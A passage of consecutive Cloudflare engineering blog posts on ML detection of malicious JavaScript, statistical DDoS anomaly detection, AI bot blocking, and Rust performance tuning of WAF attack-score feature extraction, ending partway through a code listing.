      Tackling unbalanced data: malicious scripts are the minority
      
        
      
    
    Finding malicious scripts is like finding a needle in a haystack; they are anomalies among plenty of otherwise benign JavaScript. This naturally results in a highly imbalanced dataset. For example, our Magecart-labeled scripts only account for ~6% of the total dataset.
Not only that, but the “benign” category contains an immense variance (and amount) of JavaScript to classify. The lengths of the scripts are highly diverse (ranging from just a few bytes to several megabytes), their coding styles vary widely, some are obfuscated whereas others are not, etc. To make matters worse, malicious payloads are often just small, carefully inserted fragments within an otherwise perfectly valid and functional benign script. This all creates a cacophony of token distributions for an ML model to make sense of.
Still, our biggest problem remains finding enough malevolent JavaScript to add to our training dataset. Thus, simplifying it, our strategy for data collection and annotation is two-fold:
Malicious scripts are about quantity → the more, the merrier (for our model, that is 😉). Of course, we still care about quality and diversity. But because we have so few of them (in comparison to the number of benign scripts), we take what we can.
Benign scripts are about quality → the more variance, the merrier. Here we have the opposite situation. Because we can collect so many of them easily, the value is in adding differentiated scripts.
    
      Learning key scripts only: reduce false positives with minimal annotation time
      
        
      
    
    To filter out semantically-similar scripts (mostly benign), we employed the latest advancements in LLM for generating code embeddings. We added those scripts that are distant enough from each other to our dataset, as measured by vector cosine similarity. Our methodology is simple — for a batch of potentially new scripts:
Initialize an empty vector database. For local experimentation, we are fans of Chroma DB.
For each script:
Call an LLM to generate its embedding. We’ve had good results with starcoder2, and most recently qwen2.5-coder.
Search in the database for the top-1 closest other script’s vectors.
If the distance > threshold (0.10), select it and add it to the database.
Else, discard the script (though we consider it for further validations and tests).
Although this methodology has an inherent bias in gradually favoring the first seen scripts, in practice we’ve used it for batches of newly and randomly sampled JavaScript only. To review the whole existing dataset, we could employ other but similar strategies, like applying HDBSCAN to identify an unknown number of clusters and then selecting the medoids, boundary, and anomaly data points.
We’ve successfully employed this strategy for pinpointing a few highly varied scripts that were relevant for the model to learn from. Our security researchers save a tremendous amount of time on manual annotation, while false positives are drastically reduced. For instance, in a large and unlabeled bucket of scripts, one of our early evaluation models identified ~3,000 of them as malicious. That’s too many to manually review! By removing near duplicates, we narrowed the need for annotation down to only 196 samples, less than 7% of the original amount (see the t-SNE visualization below of selected points and clusters). Three of those scripts were actually malicious, one we could not fully determine, and the rest were benign. By just re-training with these new labeled scripts, a tiny fraction of our whole dataset, we reduced false positives by 50% (as gauged in the same bucket and in a controlled test set). We have consistently repeated this procedure to iteratively enhance successive model versions.
          
          
          
^{2D visualization of scripts projected onto an embedding space, highlighting those sufficiently dissimilar from one another.}
    
      From the lab, to the real world
      
        
      
    
    Our latest model in evaluation has both a macro accuracy and an overall malicious precision nearing 99%(!) on our test dataset. So we are done, right? Wrong! The real world is not the same as the lab, where many more variances of benign JavaScript can be seen. To further assure minimum prediction changes between model releases, we follow these three anti-fool measures:
    
      Evaluate metrics uncertainty
      
        
      
    
    First, we thoroughly estimate the uncertainty of our offline evaluation metrics. How accurate are our accuracy metrics themselves? To gauge that, we calculate the standard error and confidence intervals for our offline metrics (precision, recall, F1 measure). To do that, we calculate the model’s predicted scores on the test set once (the original sample), and then generate bootstrapped resamples from it. We use simple random (re-)sampling as it offers us a more conservative estimate of error than stratified or balanced sampling.
We would generate 1,000 resamples, each a fraction of 15% resampled from the original test sample, then calculate the metrics for each individual resample. This results in a distribution of sampled data points. We measure its mean, the standard deviation (with Bessel’s correction), and finally the standard error and a confidence interval (CI) (using the percentile method, such as the 2.5 and 97.5 percentiles for a 95% CI). See below for an example of a bootstrapped distribution for precision (P), illustrating that a model’s performance is a continuum rather than a fixed value, and that might exhibit subtly (left-)skewed tails. For some of our internally evaluated models, it can easily happen that some of the sub-sampled metrics decrease by up to 20 percentage points within a 95% confidence range. High standard errors and/or confidence ranges signal needs for model improvement and for improving and increasing our test set.
          
          
          
^{An evaluation metric, here precision (P), might change significantly depending on what’s exactly tested. We thoroughly estimate the metric’s standard error and confidence intervals.}
    
      Benchmark against massive offline unlabeled dataset
      
        
      
    
    We run our model on the entire corpus of scripts seen by Cloudflare's network and temporarily cached in the last 90 days. By the way, that’s nearly 1 TiB and 26 million different JavaScript files! With that, we can observe the model’s behavior against real traffic, yet completely offline (to ensure no impact to production). We check the malicious prediction rate, latency, throughput, etc. and sample some of the predictions for verification and annotation.
    
      Review in staging and shadow mode
      
        
      
    
    Only after all the previous checks were cleared, we then run this new tentative version in our staging environment. For major model upgrades, we also deploy them in shadow mode (log-only mode) — running on production, alongside our existing model. We study the model’s behavior for a while before finally marking it as production ready, otherwise we go back to the drawing board.
    
      AI inference at scale
      
        
      
    
    At the time of writing, Page Shield sees an average of 40,000 scripts per second. Many of those scripts are repeated, though. Everything on the Internet follows a Zipf's law distribution, and JavaScript seen on the Cloudflare network is no exception. For instance, it is estimated that different versions of the Bootstrap library run on more than 20% of websites. It would be a waste of computing resources if we repeatedly re-ran the AI model for the very same inputs — inference result caching is needed. Not to mention, GPU utilization is expensive!
The question is, what is the best way to cache the scripts? We could take an SHA-256 hash of the plain content as is. However, any single change in the transmitted content (comments, spacing, or a different character set) changes the SHA-256 output hash.
A better caching approach? Since we need to parse the code into syntax trees for our GNN model anyway, this tree structure and content is what we use to hash the JavaScript. As described above, we filter out nodes in the syntax tree like comments or empty statements. In addition, some irrelevant details get abstracted out in the AST (escape sequences are unescaped, the way of writing strings is normalized, unnecessary parentheses are removed for the operations order is encoded in the tree, etc.).
Using such a tree-based approach to caching, we can conclude that at any moment over 99.9% of reported scripts have already been seen in our network! Unless we deploy a new model with significant improvements, we don’t re-score previously seen JavaScript but just return the cached score. As a result, the model only needs to be called fewer than 10 times per minute, even during peak times!
    
      Let AI help ease PCI DSS v4 compliance
      
        
      
    
    One of the most popular use cases for deploying Page Shield is to help meet the two new client-side security requirements in PCI DSS v4 — 6.4.3 and 11.6.1. These requirements make companies responsible for approving scripts used in payment pages, where payment card data could be compromised by malicious JavaScript. Both of these requirements become effective on March 31, 2025.
Page Shield with AI malicious JavaScript detection can be deployed with just a few clicks, especially if your website is already proxied through Cloudflare. Sign up here to fast track your onboarding!



Training a million models per day to save customers of all sizes from DDoS attacks
Nick Wood — Wed, 23 Oct 2024 13:00:00 GMT
 
Our always-on DDoS protection runs inside every server across our global network.  It constantly analyzes incoming traffic, looking for signals associated with previously identified DDoS attacks. We dynamically create fingerprints to flag malicious traffic, which is dropped when detected in high enough volume — so it never reaches its destination — keeping customer websites online.
In many cases, flagging bad traffic can be straightforward. For example, if we see too many requests to a destination with the same protocol violation, we can be fairly sure this is an automated script, rather than a surge of requests from a legitimate web browser.
Our DDoS systems are great at detecting attacks, but there’s a minor catch. Much like the human immune system, they are great at spotting attacks similar to things they have seen before. But for new and novel threats, they need a little help knowing what to look for, which is an expensive and time-consuming human endeavor.
Cloudflare protects millions of Internet properties, and we serve over 60 million HTTP requests per second on average, so trying to find unmitigated attacks in such a huge volume of traffic is a daunting task. In order to protect the smallest of companies, we need a way to find unmitigated attacks that may only be a few thousand requests per second, as even these can be enough to take smaller sites offline.
To better protect our customers, we also have a system to automatically identify unmitigated, or partially mitigated DDoS attacks, so we can better shore up our defenses against emerging threats. In this post we will introduce this anomaly detection pipeline, we’ll provide an overview of how it builds statistical models which flag unusual traffic and keep our customers safe. Let’s jump in!
    
      A naive volumetric model
      
        
      
    
    A DDoS attack, by definition, is characterized by a higher than normal volume of traffic destined for a particular destination. We can use this fact to loosely sketch out a potential approach. Let’s look at an example website, and look at the request volume over the course of a day, broken down into 1 minute intervals.
          
          
          
We can plot this same data as a histogram:
          
          
          
The data follows a bell-shaped curve, also known as a normal distribution. We can use this fact to flag observations which appear outside the usual range. By first calculating the mean and standard deviation of our dataset, we can then use these values to rate new observations by calculating how many standard deviations (or sigma) the data is from the mean.
This value is also called the z-score — a z-score of 3 is the same as 3-sigma, which corresponds to 3 standard deviations from the mean. A data point with a high enough z-score is sufficiently unusual that it might signal an attack. Since the mean and standard deviation are stationary, we can calculate a request volume threshold for each z-score value, and use traffic volumes above these thresholds to signal an ongoing attack.
          
          
          
^{Trigger thresholds for z-score of 3, 4 and 5}
Unfortunately, it’s incredibly rare to see traffic that is this uniform in practice, as user load will naturally vary over a day. Here I’ve simulated some traffic for a website which runs a meal delivery service, and as you might expect it has big peaks around meal times, and low traffic overnight since it only operates in a single country.
          
          
          
Our volume data no longer follows a normal distribution and our 3-sigma threshold is now much further away, so smaller attacks could pass undetected.
Many websites elastically scale their underlying hardware based upon anticipated load to save on costs. In the example above the website operator would run far fewer servers overnight, when the anticipated load is low, to save on running costs. This makes the website more vulnerable to attacks during off-peak hours as there would be less hardware to absorb them. An attack as low as a few hundred requests per minute may be enough to overwhelm the site early in the morning, even though the peak-time infrastructure could easily absorb this volume.
This approach relies on traffic volume being stable over time, meaning it’s roughly flat throughout the day, but this is rarely true in practice. Even when it is true, benign increases in traffic are common, such as an e-commerce site running a Black Friday sale. In this situation, a website would expect a surge in traffic that our model wouldn’t anticipate, and we may incorrectly flag real shoppers as attackers.
It turns out this approach makes too many naive assumptions about what traffic should look like, so it’s impossible to choose an appropriate sigma threshold which works well for all customers.
    
      Time series forecasting
      
        
      
    
    Let’s continue with trying to determine a volumetric baseline for our meal delivery example. A reasonable assumption we could add is that yesterday’s traffic shape should approximate the expected shape of traffic today. This idea is called “seasonality”. Weekly seasonality is also pretty common, i.e. websites see more or less traffic on certain weekdays or on weekends.
There are many methods designed to analyze a dataset, unpick the varying horizons of seasonality within it, and then build an appropriate predictive model. We won’t go into them here but reading about Seasonal ARIMA (SARIMA) is a good place to start if you are looking for further information.
There are three main challenges that make SARIMA methods unsuitable for our purposes. First is that in order to get a good idea of seasonality, you need a lot of data. To predict weekly seasonality, you need at least a few weeks worth of data. We’d require a massive dataset to predict monthly, or even annual, patterns (such as Black Friday). This means new customers wouldn’t be protected until they’d been with us for multiple years, so this isn’t a particularly practical approach.
The second issue is the cost of training models. In order to maintain good accuracy, time series models need to be frequently retrained. The exact frequency varies between methods, but in the worst cases, a model is only good for 2–3 inferences, meaning we’d need to retrain all our models every 10–20 minutes. This is feasible, but it’s incredibly wasteful.
The third hurdle is the hardest to work around, and is the reason why a purely volumetric model doesn’t work. Most websites experience completely benign spikes in traffic that lie outside prior norms. Flash sales are one such example, or 1,000,000 visitors driven to a site from Reddit, or a Super Bowl commercial.
    
      A better way?
      
        
      
    
    So if volumetric modeling won’t work, what can we do instead? Fortunately, volume isn’t the only axis we can use to measure traffic. Consider the end users’ browsers for example. It would be reasonable to assume that over a given time interval, the proportion of users across the top 5 browsers would remain reasonably stationary, or at least within a predictable range. More importantly, this proportion is unlikely to change too much during benign traffic surges.
Through careful analysis we were able to discover about a dozen such variables with the following features for a given zone: 
They follow a normal distribution
They aren’t correlated, or are only loosely correlated with volume
They deviate from the underlying normal distribution during “under attack” events
Recall our initial volume model, where we used z-score to define a cutoff. We can expand this same idea to multiple dimensions. We have a dozen different time series (each feature is a single time series), which we can imagine as a cloud of points in 12 dimensions. Here is a sample showing 3 such features, with each point representing the traffic readings at a different point in time. Note that both graphs show the same cloud of points from two different angles.
          
          
          
To use our z-score analogy from before, we’d want our points to be spherical, since our multidimensional- z-score is then just the distance from the centre of the cloud. We could then use this distance to define a cutoff threshold for attacks.
For several reasons, a perfect sphere is unlikely in practice. Our various features measure different things, so they have very different scales of ‘normal’. One property might vary between 100-300 whereas another property might usually occupy the interval 0-1. A change of 3 in this latter property would be a significant anomaly, whereas in the first this would just be within the normal range.
More subtly, two or more axes may be correlated, so an increase in one is usually mirrored with a proportional increase/decrease in another dimension. This turns our sphere into an off-axis disc shape, as pictured above.
Fortunately, we have a couple of mathematical tricks up our sleeve. The first is scale normalization. In each of our n dimensions, we subtract the mean, and divide by the standard deviation. This makes all our dimensions the same size and centres them around zero. This gives a multidimensional analogue of z-score, but it won’t fix the disc shape.
What we can do is figure out the orientation and dimensions of the disc, and for this we use a tool called Principal Component Analysis (PCA). This lets us reorient our disc, and rescale the axes according to their size, to make them all the same.
Imagine grabbing the disc out of the air, then drawing new X and Y axes on the top surface, with the origin at the center of the disc. Our new Z-axis is the thickness of the disc. We can compare the thickness to the diameter of the disc, to give us a scaling factor for the Z direction. Imagine stretching the disc along the z-axis until it’s as tall as the length across the diameter.
In reality there’s nothing to say that X & Y have to be the same size either, but hopefully you get the general idea. PCA lets us draw new axes along these lines of correlation in an arbitrary number of dimensions, and convert our n-dimensional disc into a nicely behaved sphere of points (technically an n-dimensional sphere).
Having done all this work, we can uniquely define a coordinate transformation which takes any measurement from our raw features, and tells us where it should lie in the sphere, and since all our dimensions are the same size we can generate an anomaly score purely based on its distance from the centre of the cloud.
As a final trick, we can also use a final scaling operation to ensure the sphere for dataset A is the same size as the sphere generated from dataset B, meaning we can do this same process for any traffic data and define a cutoff distance λ which is the same across all our models. Rather than fine-tuning models for each individual customer zone, we can tune this to a value which applies globally.
Another name for this measurement is Mahalanobis distance. (Inclined readers can understand this equivalence by considering the role of the covariance matrix in PCA and Mahalanobis distance. Further discussion can be found on this StackExchange post.) We further tune the process to discard dimensions with little variance — if our disc is too thin we discard the thickness dimension.  In practice, such dimensions were too sensitive to be useful.
          
          
          
We’re left with a multidimensional analogue of the z-score we started with, but this time our variables aren’t correlated with peacetime traffic volume. Above we show 2 output dimensions, with coloured circles which show Mahalanobis distances of 4, 5 and 6. Anything outside the green circle will be classified as an attack.
    
      How we train ~1 million models daily to keep customers safe
      
        
      
    
    The approach we’ve outlined is incredibly parallelizable: a single model requires only the traffic data for that one website, and the datasets needed can be quite small. We use 4 weeks of training data chunked into 5 minute intervals which is only ~8k rows/website.
We run all our training and inference in an Apache Airflow deployment in Kubernetes. Due to the parallelizability, we can scale horizontally as needed. On average, we can train about 3 models/second/thread. We currently retrain models every day, but we’ve observed very little intraday model drift (i.e. yesterday’s model is the same as today’s), so training frequency may be reduced in the future.
We don’t consider it necessary to build models for all our customers, instead we train models for a large sample of representative customers, including a large number on the Free plan. The goal is to identify attacks for further study which we then use to tune our existing DDoS systems for all customers.
    
      Join us!
      
        
      
    
    If you’ve read this far you may have questions, like “how do you filter attacks from your training data?” or you may have spotted a handful of other technical details which I’ve elided to keep this post accessible to a general audience. If so, you would fit in well here at Cloudflare. We’re helping to build a better Internet, and we’re hiring. 


AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection
Adam Martinetti — Fri, 27 Sep 2024 13:00:00 GMT
 The continued growth of AI has fundamentally changed the Internet over the past 24 months. AI is increasingly ubiquitous, and Cloudflare is leaning into the new opportunities and challenges it presents in a big way. This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added AI bot traffic insights on Cloudflare Radar, and given customers new AI bot blocking capabilities.  
    
      AI Assistant for WAF Rule Builder
      
        
      
    
    
          
          
          
At Cloudflare, we’re always listening to your feedback and striving to make our products as user-friendly and powerful as possible. One area where we've heard your feedback loud and clear is in the complexity of creating custom and rate-limiting rules for our Web Application Firewall (WAF). With this in mind, we’re excited to introduce a new feature that will make rule creation easier and more intuitive: the AI Assistant for WAF Rule Builder. 
          
          
          
By simply entering a natural language prompt, you can generate a custom or rate-limiting rule tailored to your needs. For example, instead of manually configuring a complex rule matching criteria, you can now type something like, "Match requests with low bot score," and the assistant will generate the rule for you. It’s not about creating the perfect rule in one step, but giving you a strong foundation that you can build on. 
The assistant will be available in the Custom and Rate Limit Rule Builder for all WAF users. We’re launching this feature in Beta for all customers, and we encourage you to give it a try. We’re looking forward to hearing your feedback (via the UI itself) as we continue to refine and enhance this tool to meet your needs.
    
      AI bot traffic insights on Cloudflare Radar
      
        
      
    
    AI platform providers use bots to crawl and scrape websites, vacuuming up data to use for model training. This is frequently done without the permission of, or a business relationship with, the content owners and providers. In July, Cloudflare urged content owners and providers to “declare their AIndependence”, providing them with a way to block AI bots, scrapers, and crawlers with a single click. In addition to this so-called “easy button” approach, sites can provide more specific guidance to these bots about what they are and are not allowed to access through directives in a robots.txt file. Regardless of whether a customer chooses to block or allow requests from AI-related bots, Cloudflare has insight into request activity from these bots, and associated traffic trends over time.
Tracking traffic trends for AI bots can help us better understand their activity over time — which are the most aggressive and have the highest volume of requests, which launch crawls on a regular basis, etc. The new AI bot & crawler traffic graph on Radar’s Traffic page provides insight into these traffic trends gathered over the selected time period for the top known AI bots. The associated list of bots tracked here is based on the ai.robots.txt list, and will be updated with new bots as they are identified. Time series and summary data is available from the Radar API as well. (Traffic trends for the full set of AI bots & crawlers can be viewed in the new Data Explorer.)
          
          
          
    
      Blocking more AI bots
      
        
      
    
    
          
          
          
For Cloudflare’s birthday, we’re following up on our previous blog post, Declaring Your AIndependence, with an update on the new detections we’ve added to stop AI bots. Customers who haven’t already done so can simply click the button to block AI bots to gain more protection for their website. 
    
      Enabling dynamic updates for the AI bot rule
      
        
      
    
    The old button allowed customers to block verified AI crawlers, those that respect robots.txt and crawl rate, and don’t try to hide their behavior. We’ve added new crawlers to that list, but we’ve also expanded the previous rule to include 27 signatures (and counting) of AI bots that don’t follow the rules. We want to take time to say “thank you” to everyone who took the time to use our “tip line” to point us towards new AI bots. These tips have been extremely helpful in finding some bots that would not have been on our radar so quickly. 
For each bot we’ve added, we’re also adding them to our “Definitely automated” definition as well. So, if you’re a self-service plan customer using Super Bot Fight Mode, you’re already protected. Enterprise Bot Management customers will see more requests shift from the “Likely Bot” range to the “Definitely automated” range, which we’ll discuss more below.
Under the hood, we’ve converted this rule logic to a Cloudflare managed rule (the same framework that powers our WAF). This enables our security analysts and engineers to safely push updates to the rule in real-time, similar to how new WAF rule changes are rapidly delivered to ensure our customers are protected against the latest CVEs. If you haven’t logged back into the Bots dashboard since the previous version of our AI bot protection was announced, click the button again to update to the latest protection. 
          
          
          
    
      The impact of new fingerprints on the model 
      
        
      
    
    One hidden beneficiary of fingerprinting new AI bots is our ML model. As we’ve discussed before, our global ML model uses supervised machine learning and greatly benefits from more sources of labeled bot data. Below, you can see how well our ML model recognized these requests as automated, before and after we updated the button, adding new rules. To keep things simple, we have shown only the top 5 bots by the volume of requests on the chart. With the introduction of our new managed rule, we have observed an improvement in our detection capabilities for the majority of these AI bots. Button v1 represents the old option that let customers block only verified AI crawlers, while Button v2 is the newly introduced feature that includes managed rule detections.
          
          
          
So how did we make our detections more robust? As we have mentioned before, sometimes a single attribute can give a bot away. We developed a sophisticated set of heuristics tailored to these AI bots, enabling us to effortlessly and accurately classify them as such. Although our ML model was already detecting the vast majority of these requests, the integration of additional heuristics has resulted in a noticeable increase in detection rates for each bot, and ensuring we score every request correctly 100% of the time. Transitioning from a purely machine learning approach to incorporating heuristics offers several advantages, including faster detection times and greater certainty in classification. While deploying a machine learning model is complex and time-consuming, new heuristics can be created in minutes. 
The initial launch of the AI bots block button was well-received and is now used by over 133,000 websites, with significant adoption even among our Free tier customers. The newly updated button, launched on August 20, 2024, is rapidly gaining traction. Over 90,000 zones have already adopted the new rule, with approximately 240 new sites integrating it every hour. Overall, we are now helping to protect the intellectual property of more than 146,000 sites from AI bots, and we are currently blocking 66 million requests daily with this new rule. Additionally, we’re excited to announce that support for configuring AI bots protection via Terraform will be available by the end of this year, providing even more flexibility and control for managing your bot protection settings.
    
      Bot behavior
      
        
      
    
    With the enhancements to our detection capabilities, it is essential to assess the impact of these changes to bot activity on the Internet. Since the launch of the updated AI bots block button, we have been closely monitoring for any shifts in bot activity and adaptation strategies. The most basic fingerprinting technique we use to identify AI bot looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who they are when they’re crawling a website. 
The graph below shows a volume of traffic we label as AI bot over the past two months. The blue line indicates the daily request count, while the red line represents the monthly average number of requests. In the past two months, we have seen an average reduction of nearly 30 million requests, with a decrease of 40 million in the most recent month.This decline coincides with the release of Button v1 and Button v2. Our hypothesis is that with the new AI bots blocking feature, Cloudflare is blocking a majority of these bots, which is discouraging them from crawling. 
          
          
          
This hypothesis is supported by the observed decline in requests from several top AI crawlers. Specifically, the Bytespider bot reduced its daily requests from approximately 100 million to just 50 million between the end of June and the end of August (see graph below). This reduction could be attributed to several factors, including our new AI bots block button and changes in the crawler's strategy.
          
          
          
We have also observed an increase in the accountability of some AI crawlers. The most basic fingerprinting technique we use to identify AI bot looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who they are when they’re crawling a website. These crawlers are now more frequently using their agents, reflecting a shift towards more transparent and responsible behavior. Notably, there has been a dramatic surge in the number of requests from the Perplexity user agent. This increase might be linked to previous accusations that Perplexity did not properly present its user agent, which could have prompted a shift in their approach to ensure better identification and compliance. 
          
          
          
These trends suggest that our updates are likely affecting how AI crawlers interact with content. We will continue to monitor AI bot activity to help users control who accesses their content and how. By keeping a close watch on emerging patterns, we aim to provide users with the tools and insights needed to make informed decisions about managing their traffic. 
    
      Wrap up
      
        
      
    
    We’re excited to continue to explore the AI landscape, whether we’re finding more ways to make the Cloudflare dashboard usable or new threats to guard against. Our AI insights on Radar update in near real-time, so please join us in watching as new trends emerge and discussing them in the Cloudflare Community.  


Making WAF ML models go brrr: saving decades of processing time
Alex Bocharov — Thu, 25 Jul 2024 13:00:46 GMT
 We made our WAF Machine Learning models 5.5x faster, reducing execution time by approximately 82%, from 1519 to 275 microseconds! Read on to find out how we achieved this remarkable improvement.
WAF Attack Score is Cloudflare's machine learning (ML)-powered layer built on top of our Web Application Firewall (WAF). Its goal is to complement the WAF and detect attack bypasses that we haven't encountered before. This has proven invaluable in catching zero-day vulnerabilities, like the one detected in Ivanti Connect Secure, before they are publicly disclosed and enhancing our customers' protection against emerging and unknown threats.
Since its launch in 2022, WAF attack score adoption has grown exponentially, now protecting millions of Internet properties and running real-time inference on tens of millions of requests per second. The feature's popularity has driven us to seek performance improvements, enabling even broader customer use and enhancing Internet security.
In this post, we will discuss the performance optimizations we've implemented for our WAF ML product. We'll guide you through specific code examples and benchmark numbers, demonstrating how these enhancements have significantly improved our system's efficiency. Additionally, we'll share the impressive latency reduction numbers observed after the rollout.
Before diving into the optimizations, let's take a moment to review the inner workings of the WAF Attack Score, which powers our WAF ML product.
    
      WAF Attack Score system design
      
        
      
    
    
            
            
            
            
            
Cloudflare's WAF attack score identifies various traffic types and attack vectors (SQLi, XSS, Command Injection, etc.) based on structural or statistical content properties. Here's how it works during inference:
HTTP Request Content: Start with raw HTTP input.
Normalization & Transformation: Standardize and clean the data, applying normalization, content substitutions, and de-duplication.
Feature Extraction: Tokenize the transformed content to generate statistical and structural data.
Machine Learning Model Inference: Analyze the extracted features with pre-trained models, mapping content representations to classes (e.g., XSS, SQLi or RCE) or scores.
Classification Output in WAF: Assign a score to the input, ranging from 1 (likely malicious) to 99 (likely clean), guiding security actions.
            
            
            
            
            
Next, we will explore feature extraction and inference optimizations.
    
      Feature extraction optimizations
      
        
      
    
    In the context of the WAF Attack Score ML model, feature extraction or pre-processing is essentially a process of tokenizing the given input and producing a float tensor of 1 x m size:
            
            
            
            
            
In our initial pre-processing implementation, this is achieved via a sliding window of 3 bytes over the input with the help of Rust’s std::collections::HashMap to look up the tensor index for a given ngram.
    
      Initial benchmarks
      
        
      
    
    To establish performance baselines, we've set up four benchmark cases representing example inputs of various lengths, ranging from 44 to 9482 bytes. Each case exemplifies typical input sizes, including those for a request body, user agent, and URI. We run benchmarks using the Criterion.rs statistics-driven micro-benchmarking tool:
            RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion
            Here are initial numbers for these benchmarks executed on a Linux laptop with a 13th Gen Intel® Core™ i7-13800H processor:

  
    Benchmark case
    Pre-processing time, μs
    Throughput, MiB/s
  

  
    preprocessing/long-body-9482
    248.46
    36.40
  
  
    preprocessing/avg-body-1000
    28.19
    33.83
  
  
    preprocessing/avg-url-44
    1.45
    28.94
  
  
    preprocessing/avg-ua-91
    2.87
    30.24
  
An important observation from these results is that pre-processing time correlates with the length of the input string, with throughput ranging from 28 MiB/s to 36 MiB/s. This suggests that considerable time is spent iterating over longer input strings. Optimizing this part of the process could significantly enhance performance. The dependency of processing time on input size highlights a key area for performance optimization. To validate this, we should examine where the processing time is spent by analyzing flamegraphs created from a 100-second profiling session visualized using pprof:
            RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion -- --profile-time 100
 
go tool pprof -http=: target/criterion/profile/preprocessing/avg-body-1000/profile.pb
            
            
            
            
            
            
Looking at the pre-processing flamegraph above, it's clear that most of the time was spent on the following two operations:

  
    Function name
    % Time spent
  

  
    std::collections::hash::map::HashMap::get
    61.8%
  
  
    regex::regex::bytes::Regex::replace_all
    18.5%
  
Let's tackle the HashMap lookups first. Lookups are happening inside the tensor_populate_ngrams function, where input is split into windows of 3 bytes representing ngram and then lookup inside two hash maps:
            fn tensor_populate_ngrams(tensor: &mut [f32], input: &[u8]) {   
   // Populate the NORM ngrams
   let mut unknown_norm_ngrams = 0;
   let norm_offset = 1;
 
   for s in input.windows(3) {
       match NORM_VOCAB.get(s) {
           Some(pos) => {
               tensor[*pos as usize + norm_offset] += 1.0f32;
           }
           None => {
               unknown_norm_ngrams += 1;
           }
       };
   }
 
   // Populate the SIG ngrams
   let mut unknown_sig_ngrams = 0;
   let sig_offset = norm_offset + NORM_VOCAB.len();
 
   let res = SIG_REGEX.replace_all(&input, b"#");
 
   for s in res.windows(3) {
       match SIG_VOCAB.get(s) {
           Some(pos) => {
               // adding +1 here as the first position will be the unknown_sig_ngrams
               tensor[*pos as usize + sig_offset + 1] += 1.0f32;
           }
           None => {
               unknown_sig_ngrams += 1;
           }
       }
   }
}
            So essentially the pre-processing function performs a ton of hash map lookups, the volume of which depends on the size of the input string, e.g. 1469 lookups for the given benchmark case avg-body-1000.
    
      Optimization attempt #1: HashMap → Aho-Corasick
      
        
      
    
    Rust hash maps are generally quite fast. However, when that many lookups are being performed, it's not very cache friendly.
So can we do better than hash maps, and what should we try first? The answer is the Aho-Corasick library.
This library provides multiple pattern search principally through an implementation of the Aho-Corasick algorithm, which builds a fast finite state machine for executing searches in linear time.
We can also tune Aho-Corasick settings based on this recommendation:
“You might want to use AhoCorasickBuilder::kind to set your searcher to always use AhoCorasickKind::DFA if search speed is critical and memory usage isn’t a concern.”
            static ref NORM_VOCAB_AC: AhoCorasick = AhoCorasick::builder().kind(Some(AhoCorasickKind::DFA)).build(&[    
    "abc",
    "def",
    "wuq",
    "ijf",
    "iru",
    "piw",
    "mjw",
    "isn",
    "od ",
    "pro",
    ...
]).unwrap();
            Then we use the constructed AhoCorasick dictionary to lookup ngrams using its find_overlapping_iter method:
            for mat in NORM_VOCAB_AC.find_overlapping_iter(&input) {
    tensor_input_data[mat.pattern().as_usize() + 1] += 1.0;
}
            We ran benchmarks and compared them against the baseline times shown above:

  
    Benchmark case
    Baseline time, μs
    Aho-Corasick time, μs
    Optimization
  

  
    preprocessing/long-body-9482
    248.46
    129.59
    -47.84% or 1.64x
  
  
    preprocessing/avg-body-1000
    28.19
    	16.47
    -41.56% or 1.71x
  
  
    preprocessing/avg-url-44
    1.45
    1.01
    -30.38% or 1.44x
  
  
    preprocessing/avg-ua-91
    2.87
    1.90
    -33.60% or 1.51x
  
That's substantially better – Aho-Corasick DFA does wonders.
    
      Optimization attempt #2: Aho-Corasick → match
      
        
      
    
    One would think optimization with Aho-Corasick DFA is enough and that it seems unlikely that anything else can beat it. Yet, we can throw Aho-Corasick away and simply use the Rust match statement and let the compiler do the optimization for us!
            #[inline]
const fn norm_vocab_lookup(ngram: &[u8; 3]) -> usize {     
    match ngram {
        b"abc" => 1,
        b"def" => 2,
        b"wuq" => 3,
        b"ijf" => 4,
        b"iru" => 5,
        b"piw" => 6,
        b"mjw" => 7,
        b"isn" => 8,
        b"od " => 9,
        b"pro" => 10,
        ...
        _ => 0,
    }
}```
            Here's how it performs in practice, based on the assembly generated by the Godbolt compiler explorer. The corresponding assembly code efficiently implements this lookup by employing a jump table and byte-wise comparisons to determine the return value based on input sequences, optimizing for quick decisions and minimal branching. Although the example only includes ten ngrams, it's important to note that in applications like our WAF Attack Score ML models, we deal with thousands of ngrams. This simple match-based approach outshines both HashMap lookups and the Aho-Corasick method.

  
    Benchmark case
    Baseline time, μs
    Match time, μs
    Optimization
  

  
    preprocessing/long-body-9482
    248.46
    	112.96
    -54.54% or 2.20x
  
  
    preprocessing/avg-body-1000
    28.19
    	13.12
    -53.45% or 2.15x
  
  
    preprocessing/avg-url-44
    1.45
    0.75
    -48.37% or 1.94x
  
  
    preprocessing/avg-ua-91
    2.87
    1.4076
    -50.91% or 2.04x
  
Switching to match gave us another 7-18% drop in latency, depending on the case.
    
      Optimization attempt #3: Regex → WindowedReplacer
      
        
      
    
    So, what exactly is the purpose of Regex::replace_all in pre-processing? Regex is defined and used like this:
            pub static SIG_REGEX: Lazy =
    Lazy::new(|| RegexBuilder::new("[a-z]+").unicode(false).build().unwrap());
    ... 
    let res = SIG_REGEX.replace_all(&input, b"#");
    for s in res.windows(3) {
        tensor[sig_vocab_lookup(s.try_into().unwrap())] += 1.0;
    }
            Essentially, all we need is to:
Replace every sequence of lowercase letters in the input with a single byte "#".
Iterate over replaced bytes in a windowed fashion with a step of 3 bytes representing an ngram.
Look up the ngram index and increment it in the tensor.
This logic seems simple enough that we could implement it more efficiently with a single pass over the input and without any allocations:
            type Window = [u8; 3];
type Iter<'a> = Peekable>;

pub struct WindowedReplacer<'a> {
    window: Window,
    input_iter: Iter<'a>,
}

#[inline]
fn is_replaceable(byte: u8) -> bool {
    matches!(byte, b'a'..=b'z')
}

#[inline]
fn next_byte(iter: &mut Iter) -> Option {
    let byte = iter.next().copied()?;
    if is_replaceable(byte) {
        while iter.next_if(|b| is_replaceable(**b)).is_some() {}
        Some(b'#')
    } else {
        Some(byte)
    }
}

impl<'a> WindowedReplacer<'a> {
    pub fn new(input: &'a [u8]) -> Option {
        let mut window: Window = Default::default();
